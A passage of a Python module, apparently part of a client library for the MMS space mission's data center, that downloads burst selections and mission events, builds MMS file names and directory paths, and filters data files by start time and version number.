Cut text from TAI keys\n data = _response_text_to_dict(r.text)\n\n # Convert to useful types\n types = ['int16', 'int64', 'int64', 'str', 'float32', 'int8',\n 'int8', 'str', 'int32', 'str', 'datetime', 'datetime',\n 'int32', 'int32', 'int32', 'int32', 'int32', 'int32',\n 'int32', 'int32', 'int32', 'int32', 'int32', 'str']\n for key, type in zip(data, types):\n if type == 'str':\n pass\n elif type == 'datetime':\n data[key] = [dt.datetime.strptime(value,\n '%Y-%m-%d %H:%M:%S'\n )\n if value != '' else value\n for value in data[key]\n ]\n else:\n data[key] = np.asarray(data[key], dtype=type)\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n data['dt'] = data['taiendtime'] - data['taistarttime']\n\n # Convert TAISTART/ENDTIME to datetimes\n # NOTE! If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime(\n *value[0:6], value[6] * 1000 + value[7]\n )\n for value in\n epochs.CDFepoch.breakdown_tt2000(\n data['taistarttime'] * int(1e9) + t_1958\n )\n ]\n data['tstop'] = [dt.datetime(\n *value[0:6], value[6] * 1000 + value[7]\n )\n for value in\n epochs.CDFepoch.breakdown_tt2000(\n data['taiendtime'] * int(1e9) + t_1958\n )\n ]\n data['start_time'] = [tstart.strftime('%Y-%m-%d %H:%M:%S')\n for tstart in data['tstart']]\n data['stop_time'] = [tend.strftime('%Y-%m-%d %H:%M:%S')\n for tend in data['tstop']]\n\n return data\n\n\ndef burst_selections(selection_type, start, stop):\n '''\n A factory function for retrieving burst selection data.\n\n Parameters\n ----------\n type : str\n The type of data to retrieve. Options include:\n Type Source Description\n ========= ========================= =======================================\n abs download_selections_files ABS selections\n sitl download_selections_files SITL selections\n sitl+back burst_data_segments SITL and backstructure selections\n gls download_selections_files ground loop selections from 'mp-dl-unh'\n mp-dl-unh download_selections_files ground loop selections from 'mp-dl-unh'\n ========= ======================== =======================================\n start, stop : `datetime.datetime`\n Time interval for which data is to be retrieved\n\n Returns\n -------\n data : struct\n The requested data\n '''\n if isinstance(start, (int, np.integer)):\n orbit = mission_events('orbit', start, start)\n start = min(orbit['tstart'])\n if isinstance(stop, (int, np.integer)):\n orbit = mission_events('orbit', stop, stop)\n stop = max(orbit['tend'])\n\n data_retriever = _get_selection_retriever(selection_type)\n return data_retriever(start, stop)\n\n\ndef _get_selection_retriever(selection_type):\n '''\n Creator function for mission events data.\n\n Parameters\n ----------\n selections_type : str\n Type of data desired\n\n Returns\n -------\n func : function\n Function to generate the data\n '''\n if selection_type == 'abs':\n return _get_abs_data\n elif selection_type == 'sitl':\n return _get_sitl_data\n elif selection_type == 'sitl+back':\n return burst_data_segments\n elif selection_type in ('gls', 'mp-dl-unh'):\n return _get_gls_data\n else:\n raise ValueError('Burst selection type {} not recognized'\n .format(selection_type))\n\n\ndef _get_abs_data(start, stop):\n '''\n Download and read Automated Burst Selections sav files.\n '''\n abs_files = download_selections_files('abs_selections',\n start_date=start, end_date=stop)\n return _read_fom_structures(abs_files)\n\n\ndef _get_sitl_data(start, 
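The if/elif chain in _get_selection_retriever() can be expressed as a dict-based dispatch table. A sketch with placeholder strings standing in for the module's private handler functions:

def get_retriever(selection_type):
    # Placeholder values stand in for _get_abs_data, _get_sitl_data, etc.
    handlers = {'abs': 'abs-handler',
                'sitl': 'sitl-handler',
                'sitl+back': 'segments-handler',
                'gls': 'gls-handler',
                'mp-dl-unh': 'gls-handler'}
    try:
        return handlers[selection_type]
    except KeyError:
        raise ValueError('Burst selection type {} not recognized'
                         .format(selection_type))

assert get_retriever('gls') == get_retriever('mp-dl-unh')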
stop):\n '''\n Download and read SITL selections sav files.\n '''\n sitl_files = download_selections_files('sitl_selections',\n start_date=start, end_date=stop)\n return _read_fom_structures(sitl_files)\n\n\ndef _get_gls_data(start, stop):\n '''\n Download and read Ground Loop Selections csv files.\n '''\n gls_files = download_selections_files('gls_selections',\n gls_type='mp-dl-unh',\n start_date=start, end_date=stop)\n\n # Prepare to loop over files\n if isinstance(gls_files, str):\n gls_files = [gls_files]\n\n # Statistics of bad selections\n fskip = 0 # number of files skipped\n nskip = 0 # number of selections skipped\n nexpand = 0 # number of selections expanded\n result = dict()\n\n # Read multiple files\n for file in gls_files:\n data = read_gls_csv(file)\n\n # Accumulative sum of errors\n fskip += data['errors']['fskip']\n nskip += data['errors']['nskip']\n nexpand += data['errors']['nexpand']\n if data['errors']['fskip']:\n continue\n del data['errors']\n\n # Extend results from all files. Keep track of the file\n # names since entries can change. The most recent file\n # contains the correct selections information.\n if len(result) == 0:\n result = data\n result['file'] = [file] * len(result['fom'])\n else:\n result['file'].extend([file] * len(result['fom']))\n for key, value in data.items():\n result[key].extend(value)\n\n # Display bad data\n if (fskip > 0) | (nskip > 0) | (nexpand > 0):\n print('GLS Selection Adjustments:')\n print(' # files skipped: {}'.format(fskip))\n print(' # entries skipped: {}'.format(nskip))\n print(' # entries expanded: {}'.format(nexpand))\n\n return result\n\n\ndef _read_fom_structures(files):\n '''\n Read multiple IDL sav files containing ABS or SITL selections.\n '''\n # Read data from all files\n result = dict()\n for file in files:\n data = read_eva_fom_structure(file)\n if data['valid'] == 0:\n print('Skipping invalid file {0}'.format(file))\n continue\n\n # Turn scalars into lists so they can be accumulated\n # across multiple files.\n #\n # Keep track of file name because the same selections\n # (or updated versions of the same selections) can be\n # stored in multiple files, if they were submitted to\n # the SDC multiple times.\n if len(result) == 0:\n result = {key:\n (value\n if isinstance(value, list)\n else [value]\n )\n for key, value in data.items()\n }\n result['file'] = [file] * len(data['fom'])\n\n # Append or extend data from subsequent files\n else:\n result['file'].extend([file] * len(data['fom']))\n for key, value in data.items():\n if isinstance(value, list):\n result[key].extend(value)\n else:\n result[key].append(value)\n\n return result\n\n\ndef construct_file_names(*args, data_type='science', **kwargs):\n '''\n Construct a file name compliant with MMS file name format guidelines.\n\n MMS file names follow the convention\n sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n\n Parameters\n ----------\n *args : dict\n Arguments to be passed along.\n data_type : str\n Type of file names to construct. Options are:\n science or *_selections. If science, inputs are\n passed to construct_science_file_names. 
If\n        *_selections, inputs are passed to\n        construct_selections_file_names.\n    **kwargs : dict\n        Keywords to be passed along.\n\n    Returns\n    -------\n    fnames : list\n        File names constructed from inputs.\n    '''\n\n    if data_type == 'science':\n        fnames = construct_science_file_names(*args, **kwargs)\n    elif 'selections' in data_type:\n        fnames = construct_selections_file_names(data_type, **kwargs)\n\n    return fnames\n\n\ndef construct_selections_file_names(data_type, tstart='*', gls_type=None):\n    '''\n    Construct a SITL selections file name compliant with\n    MMS file name format guidelines.\n\n    MMS SITL selection file names follow the convention\n        data_type_[gls_type]_tstart.sav\n\n    Parameters\n    ----------\n    data_type : str, list, tuple\n        Type of selections. Options are abs_selections,\n        sitl_selections, or gls_selections.\n    tstart : str, list\n        Start time of data file. The format is\n        YYYY-MM-DD-hh-mm-ss. If not given, the default is \"*\".\n    gls_type : str, list\n        Type of ground-loop selections. Possible values are:\n        mp-dl-unh.\n\n    Returns\n    -------\n    fnames : list\n        File names constructed from inputs.\n    '''\n\n    # Convert inputs to iterable lists\n    if isinstance(data_type, str):\n        data_type = [data_type]\n    if isinstance(gls_type, str):\n        gls_type = [gls_type]\n    if isinstance(tstart, str):\n        tstart = [tstart]\n\n    # Accept tuples, as those returned by Construct_Filename\n    #   - Extract tstart and gls_type before data_type is overwritten\n    if isinstance(data_type, tuple):\n        tstart = [file[-1] for file in data_type]\n\n        if len(data_type[0]) > 2:\n            gls_type = [file[1] for file in data_type]\n        else:\n            gls_type = None\n\n        data_type = [file[0] for file in data_type]\n\n    # Create the file names\n    if gls_type is None:\n        fnames = ['_'.join((d, t + '.sav'))\n                  for d in data_type\n                  for t in tstart\n                  ]\n\n    else:\n        fnames = ['_'.join((d, g, t + '.sav'))\n                  for d in data_type\n                  for g in gls_type\n                  for t in tstart\n                  ]\n\n    return fnames\n\n\ndef construct_science_file_names(sc, instr=None, mode=None, level=None,\n                                 tstart='*', version='*', optdesc=None):\n    '''\n    Construct a science file name compliant with MMS\n    file name format guidelines.\n\n    MMS science file names follow the convention\n        sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n\n    Parameters\n    ----------\n    sc : str, list, tuple\n        Spacecraft ID(s)\n    instr : str, list\n        Instrument ID(s)\n    mode : str, list\n        Data rate mode(s). Options include slow, fast, srvy, brst\n    level : str, list\n        Data level(s). Options include l1a, l1b, l2pre, l2, l3\n    tstart : str, list\n        Start time of data file. In general, the format is\n        YYYYMMDDhhmmss for \"brst\" mode and YYYYMMDD for \"srvy\"\n        mode (though there are exceptions). If not given, the\n        default is \"*\".\n    version : str, list\n        File version, formatted as \"X.Y.Z\", where X, Y, and Z\n        are integer version numbers.\n    optdesc : str, list\n        Optional file name descriptor. 
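With the tuple handling fixed above, the nested comprehensions in construct_selections_file_names() amount to a cartesian product over the inputs. An equivalent sketch using itertools.product (illustrative, not the module's code):

from itertools import product

def selections_names(data_type, tstart='*', gls_type=None):
    data_type = [data_type] if isinstance(data_type, str) else data_type
    tstart = [tstart] if isinstance(tstart, str) else tstart
    if gls_type is None:
        return ['_'.join((d, t)) + '.sav' for d, t in product(data_type, tstart)]
    gls_type = [gls_type] if isinstance(gls_type, str) else gls_type
    return ['_'.join((d, g, t)) + '.sav'
            for d, g, t in product(data_type, gls_type, tstart)]

assert selections_names('gls_selections', '2019-01-01-00-00-00', 'mp-dl-unh') \
    == ['gls_selections_mp-dl-unh_2019-01-01-00-00-00.sav']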
If multiple parts,\n they should be separated by hyphens (\"-\"), not under-\n scores (\"_\").\n\n Returns\n -------\n fnames : str, list\n File names constructed from inputs.\n '''\n\n # Convert all to lists\n if isinstance(sc, str):\n sc = [sc]\n if isinstance(instr, str):\n instr = [instr]\n if isinstance(mode, str):\n mode = [mode]\n if isinstance(level, str):\n level = [level]\n if isinstance(tstart, str):\n tstart = [tstart]\n if isinstance(version, str):\n version = [version]\n if optdesc is not None and isinstance(optdesc, str):\n optdesc = [optdesc]\n\n # Accept tuples, as those returned by Construct_Filename\n if type(sc) == 'tuple':\n sc_ids = [file[0] for file in sc]\n instr = [file[1] for file in sc]\n mode = [file[2] for file in sc]\n level = [file[3] for file in sc]\n tstart = [file[-2] for file in sc]\n version = [file[-1] for file in sc]\n\n if len(sc) > 6:\n optdesc = [file[4] for file in sc]\n else:\n optdesc = None\n else:\n sc_ids = sc\n\n if optdesc is None:\n fnames = ['_'.join((s, i, m, l, t, 'v' + v + '.cdf'))\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n for v in version\n ]\n else:\n fnames = ['_'.join((s, i, m, l, o, t, 'v' + v + '.cdf'))\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n for v in version\n ]\n return fnames\n\n\ndef construct_path(*args, data_type='science', **kwargs):\n '''\n Construct a directory structure compliant with MMS path guidelines.\n\n MMS paths follow the convention\n selections: sitl/type_selections_[gls_type_]\n brst: sc/instr/mode/level[/optdesc]///\n srvy: sc/instr/mode/level[/optdesc]//\n\n Parameters\n ----------\n *args : dict\n Arguments to be passed along.\n data_type : str\n Type of file names to construct. Options are:\n science or *_selections. If science, inputs are\n passed to construct_science_file_names. If\n *_selections, inputs are passed to\n construct_selections_file_names.\n **kwargs : dict\n Keywords to be passed along.\n\n Returns\n -------\n paths : list\n Paths constructed from inputs.\n '''\n\n if data_type == 'science':\n paths = construct_science_path(*args, **kwargs)\n elif 'selections' in data_type:\n paths = construct_selections_path(data_type, **kwargs)\n else:\n raise ValueError('Invalid value for keyword data_type')\n\n return paths\n\n\ndef construct_selections_path(data_type, tstart='*', gls_type=None,\n root='', files=False):\n '''\n Construct a directory structure compliant with MMS path\n guidelines for SITL selections.\n\n MMS SITL selections paths follow the convention\n sitl/[data_type]_selections[_gls_type]/\n\n Parameters\n ----------\n data_type : str, list, tuple\n Type of selections. Options are abs_selections\n sitl_selections, or gls_selections.\n tstart : str, list\n Start time of data file. The format is\n YYYY-MM-DD-hh-mm-ss. If not given, the default is \"*\".\n gls_type : str, list\n Type of ground-loop selections. 
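For a single set of inputs, the science naming convention documented above reduces to one join. The values below are a representative example, not captured output:

sc, instr, mode, level, tstart, version = (
    'mms1', 'fgm', 'srvy', 'l2', '20191001', '4.18.0')
fname = '_'.join((sc, instr, mode, level, tstart, 'v' + version + '.cdf'))
assert fname == 'mms1_fgm_srvy_l2_20191001_v4.18.0.cdf'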
Possible values are:\n mp-dl-unh.\n root : str\n Root of the SDC-like directory structure.\n files : bool\n If True, file names are associated with each path.\n\n Returns\n -------\n paths : list\n Paths constructed from inputs.\n '''\n\n # Convert inputs to iterable lists\n if isinstance(data_type, str):\n data_type = [data_type]\n if isinstance(gls_type, str):\n gls_type = [gls_type]\n if isinstance(tstart, str):\n tstart = [tstart]\n\n # Accept tuples, as those returned by Construct_Filename\n if isinstance(data_type, tuple):\n data_type = [file[0] for file in data_type]\n tstart = [file[-1] for file in data_type]\n\n if len(data_type > 2):\n gls_type = [file[1] for file in data_type]\n else:\n gls_type = None\n\n # Paths + Files\n if files:\n if gls_type is None:\n paths = [os.path.join(root, 'sitl', d, '_'.join((d, t + '.sav')))\n for d in data_type\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, 'sitl', d, '_'.join((d, g, t + '.sav')))\n for d in data_type\n for g in gls_type\n for t in tstart\n ]\n\n # Paths\n else:\n if gls_type is None:\n paths = [os.path.join(root, 'sitl', d)\n for d in data_type\n ]\n else:\n paths = [os.path.join(root, 'sitl', d)\n for d in data_type\n ]\n\n return paths\n\n\ndef construct_science_path(sc, instr=None, mode=None, level=None, tstart='*',\n optdesc=None, root='', files=False):\n '''\n Construct a directory structure compliant with\n MMS path guidelines for science files.\n\n MMS science paths follow the convention\n brst: sc/instr/mode/level[/optdesc]///\n srvy: sc/instr/mode/level[/optdesc]//\n\n Parameters\n ----------\n sc : str, list, tuple\n Spacecraft ID(s)\n instr : str, list\n Instrument ID(s)\n mode : str, list\n Data rate mode(s). Options include slow, fast, srvy, brst\n level : str, list\n Data level(s). Options include l1a, l1b, l2pre, l2, l3\n tstart : str, list\n Start time of data file, formatted as a date: '%Y%m%d'.\n If not given, all dates from 20150901 to today's date are\n used.\n optdesc : str, list\n Optional file name descriptor. If multiple parts,\n they should be separated by hyphens (\"-\"), not under-\n scores (\"_\").\n root : str\n Root directory at which the directory structure begins.\n files : bool\n If True, file names will be generated and appended to the\n paths. The file tstart will be \"YYYYMMDD*\" (i.e. 
the date\n with an asterisk) and the version number will be \"*\".\n\n Returns\n -------\n fnames : str, list\n File names constructed from inputs.\n '''\n\n # Convert all to lists\n if isinstance(sc, str):\n sc = [sc]\n if isinstance(instr, str):\n instr = [instr]\n if isinstance(mode, str):\n mode = [mode]\n if isinstance(level, str):\n level = [level]\n if isinstance(tstart, str):\n tstart = [tstart]\n if optdesc is not None and isinstance(optdesc, str):\n optdesc = [optdesc]\n\n # Accept tuples, as those returned by construct_filename\n if type(sc) == 'tuple':\n sc_ids = [file[0] for file in sc]\n instr = [file[1] for file in sc]\n mode = [file[2] for file in sc]\n level = [file[3] for file in sc]\n tstart = [file[-2] for file in sc]\n\n if len(sc) > 6:\n optdesc = [file[4] for file in sc]\n else:\n optdesc = None\n else:\n sc_ids = sc\n\n # Paths + Files\n if files:\n if optdesc is None:\n paths = [os.path.join(root, s, i, m, l, t[0:4], t[4:6], t[6:8],\n '_'.join((s, i, m, l, t + '*', 'v*.cdf'))\n )\n if m == 'brst'\n else\n os.path.join(root, s, i, m, l, t[0:4], t[4:6],\n '_'.join((s, i, m, l, t + '*', 'v*.cdf'))\n )\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, s, i, m, l, o, t[0:4], t[4:6], t[6:8],\n '_'.join((s, i, m, l, o, t + '*', 'v*.cdf'))\n )\n if m == 'brst'\n else\n os.path.join(root, s, i, m, l, o, t[0:4], t[4:6],\n '_'.join((s, i, m, l, o, t + '*', 'v*.cdf'))\n )\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n ]\n\n # Paths\n else:\n if optdesc is None:\n paths = [os.path.join(root, s, i, m, l, t[0:4], t[4:6], t[6:8])\n if m == 'brst' else\n os.path.join(root, s, i, m, l, t[0:4], t[4:6])\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, s, i, m, l, o, t[0:4], t[4:6], t[6:8])\n if m == 'brst' else\n os.path.join(root, s, i, m, l, o, t[0:4], t[4:6])\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n ]\n\n return paths\n\n\ndef download_selections_files(data_type='abs_selections',\n start_date=None, end_date=None,\n gls_type=None):\n \"\"\"\n Download SITL selections from the SDC.\n\n Parameters\n ----------\n data_type : str\n Type of SITL selections to download. Options are\n 'abs_selections', 'sitl_selections', 'gls_selections'\n gls_type : str\n Type of gls_selections. Options are\n 'mp-dl-unh'\n start_date : `dt.datetime` or str\n Start date of data interval\n end_date : `dt.datetime` or str\n End date of data interval\n\n Returns\n -------\n local_files : list\n Names of the selection files that were downloaded. 
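The brst/srvy branching in construct_science_path() comes down to whether a day directory is appended. The same decision in isolation, for one made-up file:

import os

s, i, m, l, t = 'mms1', 'fgm', 'brst', 'l2', '20191001'
path = (os.path.join(s, i, m, l, t[0:4], t[4:6], t[6:8]) if m == 'brst'
        else os.path.join(s, i, m, l, t[0:4], t[4:6]))
assert path == os.path.join('mms1', 'fgm', 'brst', 'l2', '2019', '10', '01')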
Files\n can be read using mms.read_eva_fom_structure()\n \"\"\"\n\n if gls_type is not None:\n data_type = '_'.join((data_type, gls_type))\n\n # Setup the API\n api = MrMMS_SDC_API()\n api.data_type = data_type\n api.start_date = start_date\n api.end_date = end_date\n\n # Download the files\n local_files = api.download_files()\n return local_files\n\n\ndef file_start_time(file_name):\n '''\n Extract the start time from a file name.\n\n Parameters\n ----------\n file_name : str\n File name from which the start time is extracted.\n\n Returns\n -------\n fstart : `datetime.datetime`\n Start time of the file, extracted from the file name\n '''\n\n try:\n # Selections: YYYY-MM-DD-hh-mm-ss\n fstart = re.search('[0-9]{4}(-[0-9]{2}){5}', file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y-%m-%d-%H-%M-%S')\n except AttributeError:\n try:\n # Brst: YYYYMMDDhhmmss\n fstart = re.search('20[0-9]{2}' # Year\n '(0[0-9]|1[0-2])' # Month\n '([0-2][0-9]|3[0-1])' # Day\n '([0-1][0-9]|2[0-4])' # Hour\n '[0-5][0-9]' # Minute\n '([0-5][0-9]|60)', # Second\n file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y%m%d%H%M%S')\n except AttributeError:\n try:\n # Srvy: YYYYMMDD\n fstart = re.search('20[0-9]{2}' # Year\n '(0[0-9]|1[0-2])' # Month\n '([0-2][0-9]|3[0-1])', # Day\n file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y%m%d')\n except AttributeError:\n raise AttributeError('File start time not identified in: \\n'\n ' \"{}\"'.format(file_name))\n\n return fstart\n\n\ndef filename2path(fname, root=''):\n \"\"\"\n Convert an MMS file name to an MMS path.\n\n MMS paths take the form\n\n sc/instr/mode/level[/optdesc]/YYYY/MM[/DD/]\n\n where the optional descriptor [/optdesc] is included if it is also in the\n file name and day directory [/DD] is included if mode='brst'.\n\n Parameters\n ----------\n fname : str\n File name to be turned into a path.\n root : str\n Absolute directory\n\n Returns\n -------\n path : list\n Path to the data file.\n \"\"\"\n\n parts = parse_file_name(fname)\n\n # data_type = '*_selections'\n if 'selections' in parts[0]:\n path = os.path.join(root, parts[0])\n\n # data_type = 'science'\n else:\n # Create the directory structure\n # sc/instr/mode/level[/optdesc]/YYYY/MM/\n path = os.path.join(root, *parts[0:5], parts[5][0:4], parts[5][4:6])\n\n # Burst files require the DAY directory\n # sc/instr/mode/level[/optdesc]/YYYY/MM/DD/\n if parts[2] == 'brst':\n path = os.path.join(path, parts[5][6:8])\n\n path = os.path.join(path, fname)\n\n return path\n\n\ndef filter_time(fnames, start_date, end_date):\n \"\"\"\n Filter files by their start times.\n\n Parameters\n ----------\n fnames : str, list\n File names to be filtered.\n start_date : str\n Start date of time interval, formatted as '%Y-%m-%dT%H:%M:%S'\n end_date : str\n End date of time interval, formatted as '%Y-%m-%dT%H:%M:%S'\n\n Returns\n -------\n paths : list\n Path to the data file.\n \"\"\"\n\n # Make sure file names are iterable. 
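The burst-mode pattern in file_start_time() is the strictest of its three fallbacks. Applied on its own to a plausible burst file name:

import datetime as dt
import re

name = 'mms1_fgm_brst_l2_20191001133523_v4.18.0.cdf'
match = re.search('20[0-9]{2}'            # year
                  '(0[0-9]|1[0-2])'       # month
                  '([0-2][0-9]|3[0-1])'   # day
                  '([0-1][0-9]|2[0-4])'   # hour
                  '[0-5][0-9]'            # minute
                  '([0-5][0-9]|60)',      # second
                  name)
fstart = dt.datetime.strptime(match.group(0), '%Y%m%d%H%M%S')
assert fstart == dt.datetime(2019, 10, 1, 13, 35, 23)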
Allocate output array\n files = fnames\n if isinstance(files, str):\n files = [files]\n\n # If dates are strings, convert them to datetimes\n if isinstance(start_date, str):\n start_date = dt.datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S')\n if isinstance(end_date, str):\n end_date = dt.datetime.strptime(end_date, '%Y-%m-%dT%H:%M:%S')\n\n # Parse the time out of the file name\n fstart = [file_start_time(file) for file in files]\n\n # Sort the files by start time\n isort = sorted(range(len(fstart)), key=lambda k: fstart[k])\n fstart = [fstart[i] for i in isort]\n files = [files[i] for i in isort]\n\n # End time\n # - Any files that start on or before END_DATE can be kept\n idx = [i for i, t in enumerate(fstart) if t <= end_date]\n if len(idx) > 0:\n fstart = [fstart[i] for i in idx]\n files = [files[i] for i in idx]\n else:\n fstart = []\n files = []\n\n # Start time\n # - Any file with TSTART <= START_DATE can potentially have data\n # in our time interval of interest.\n # - Assume the start time of one file marks the end time of the\n # previous file.\n # - With this, we look for the file that begins just prior to START_DATE\n # and throw away any files that start before it.\n idx = [i for i, t in enumerate(fstart) if t >= start_date]\n if (len(idx) == 0) and \\\n (len(fstart) > 0) and \\\n (fstart[-1].date() == start_date.date()):\n idx = [len(fstart) - 1]\n\n elif (len(idx) != 0) and \\\n ((idx[0] != 0) and (fstart[idx[0]] != start_date)):\n idx.insert(0, idx[0] - 1)\n\n if len(idx) > 0:\n fstart = [fstart[i] for i in idx]\n files = [files[i] for i in idx]\n else:\n fstart = []\n files = []\n\n return files\n\n\ndef filter_version(files, latest=None, version=None, min_version=None):\n '''\n Filter file names according to their version numbers.\n\n Parameters\n ----------\n files : str, list\n File names to be turned into paths.\n latest : bool\n If True, the latest version of each file type is\n returned. 
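The boundary handling in filter_time() is subtle: a daily file that starts before the interval may still cover it. A toy run of the same index logic on three daily start times:

import datetime as dt

fstart = sorted(dt.datetime(2019, 10, d) for d in (1, 2, 3))
start, end = dt.datetime(2019, 10, 2, 6), dt.datetime(2019, 10, 2, 18)
fstart = [t for t in fstart if t <= end]            # drop files starting after the interval
idx = [i for i, t in enumerate(fstart) if t >= start]
if not idx and fstart and fstart[-1].date() == start.date():
    idx = [len(fstart) - 1]                         # daily file covering the interval
elif idx and idx[0] != 0 and fstart[idx[0]] != start:
    idx.insert(0, idx[0] - 1)                       # file starting just before the interval
assert [fstart[i] for i in idx] == [dt.datetime(2019, 10, 2)]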
if `version` and `min_version` are not\n        set, this is the default.\n    version : str\n        Only files with this version are returned.\n    min_version : str\n        All files with version greater than or equal to this\n        are returned.\n\n    Returns\n    -------\n    filtered_files : list\n        The files remaining after applying filter conditions.\n    '''\n\n    if version is None and min_version is None:\n        latest = True\n    if ((version is not None) + (min_version is not None)\n            + (latest is not None)) > 1:\n        raise ValueError('latest, version, and min_version are mutually exclusive.')\n\n    # Output list\n    filtered_files = []\n\n    # Extract the version\n    parts = [parse_file_name(file) for file in files]\n    versions = [part[-1] for part in parts]\n\n    # The latest version of each file type\n    if latest:\n        # Parse file names and identify unique file types\n        #   - File types include all parts of the file name except the\n        #     start time and version number\n        bases = ['_'.join(part[0:-2]) for part in parts]\n        uniq_bases = list(set(bases))\n\n        # Filter according to unique file type\n        for uniq_base in uniq_bases:\n            test_idx = [i\n                        for i, test_base in enumerate(bases)\n                        if test_base == uniq_base]\n            # Use the first file of this type as the reference version\n            file_ref = files[test_idx[0]]\n            vXYZ_ref = [int(v) for v in versions[test_idx[0]].split('.')]\n\n            filtered_files.append(file_ref)\n            for i in test_idx:\n                vXYZ = [int(v) for v in versions[i].split('.')]\n                if ((vXYZ[0] > vXYZ_ref[0]) or\n                        (vXYZ[0] == vXYZ_ref[0] and\n                         vXYZ[1] > vXYZ_ref[1]) or\n                        (vXYZ[0] == vXYZ_ref[0] and\n                         vXYZ[1] == vXYZ_ref[1] and\n                         vXYZ[2] > vXYZ_ref[2])):\n                    filtered_files[-1] = files[i]\n                    vXYZ_ref = vXYZ\n\n    # All files with version number greater than or equal to MIN_VERSION\n    elif min_version is not None:\n        vXYZ_min = [int(v) for v in min_version.split('.')]\n        for idx, v in enumerate(versions):\n            vXYZ = [int(vstr) for vstr in v.split('.')]\n            if ((vXYZ[0] > vXYZ_min[0]) or\n                    ((vXYZ[0] == vXYZ_min[0]) and\n                     (vXYZ[1] > vXYZ_min[1])) or\n                    ((vXYZ[0] == vXYZ_min[0]) and\n                     (vXYZ[1] == vXYZ_min[1]) and\n                     (vXYZ[2] >= vXYZ_min[2]))):\n                filtered_files.append(files[idx])\n\n    # All files with a particular version number\n    elif version is not None:\n        vXYZ_ref = [int(v) for v in version.split('.')]\n        for idx, v in enumerate(versions):\n            vXYZ = [int(vstr) for vstr in v.split('.')]\n            if (vXYZ[0] == vXYZ_ref[0] and\n                    vXYZ[1] == vXYZ_ref[1] and\n                    vXYZ[2] == vXYZ_ref[2]):\n                filtered_files.append(files[idx])\n\n    return filtered_files\n\n\ndef mission_events(event_type, start, stop, sc=None):\n    \"\"\"\n    Download MMS mission events. See the filters on the webpage\n    for more ideas.\n        https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n    Parameters\n    ----------\n    event_type : str\n        Type of event. 
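The three-way comparisons in filter_version() implement numeric ordering on 'X.Y.Z' strings. Python tuple comparison gives the same ordering more compactly, and shows why plain string comparison would be wrong:

def vtuple(version):
    # '4.18.0' -> (4, 18, 0); compares numerically, unlike the raw string
    return tuple(int(part) for part in version.split('.'))

assert '4.18.0' < '4.9.9'                  # lexicographic order is wrong
assert vtuple('4.18.0') > vtuple('4.9.9')  # numeric order is right
assert max(['1.0.0', '4.18.0', '4.2.1'], key=vtuple) == '4.18.0'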
Options are 'apogee', 'dsn_contact', 'orbit',\n 'perigee', 'science_roi', 'shadow', 'sitl_window', 'sroi'.\n start, stop : `datetime.datetime`, int\n Start and end of the data interval, specified as a time or\n orbit range.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n event_func = _get_mission_events(event_type)\n return event_func(start, stop, sc)\n\n\ndef _get_mission_events(event_type):\n if event_type == 'apogee':\n return _get_apogee\n elif event_type == 'dsn_contact':\n return _get_dsn_contact\n elif event_type == 'orbit':\n return _get_orbit\n elif event_type == 'perigee':\n return _get_perigee\n elif event_type == 'science_roi':\n return _get_science_roi\n elif event_type == 'shadow':\n return _get_shadow\n elif event_type == 'sitl_window':\n return _get_sitl_window\n elif event_type == 'sroi':\n return _get_sroi\n\n\ndef _get_apogee(start, stop, sc):\n '''\n Apogee information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='apogee')\n\n\ndef _get_dsn_contact(start, stop, sc):\n '''\n Science region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. Defines the limits of when\n fast survey and burst data can be available each orbit.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='dsn_contact')\n\n\ndef _get_orbit(start, stop, sc):\n '''\n Orbital information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='orbit')\n\n\ndef _get_perigee(start, stop, sc):\n '''\n Perigee information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='perigee')\n\n\ndef _get_science_roi(start, stop, sc):\n '''\n Science region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. Defines the limits of when\n fast survey and burst data can be available each orbit.\n '''\n return _mission_data(start, stop, sc=sc,\n source='BDM', event_type='science_roi')\n\n\ndef _get_shadow(start, stop, sc):\n '''\n Earth shadow information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='POC', event_type='shadow')\n\n\ndef _get_sroi(start, stop, sc):\n '''\n Sub-region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. There can be several\n SROIs per science_roi.\n '''\n return _mission_data(start, stop, sc=sc,\n source='POC', event_type='SROI')\n\n\ndef _get_sitl_window(start, stop, sc):\n '''\n SITL window information between `start` and `stop` and 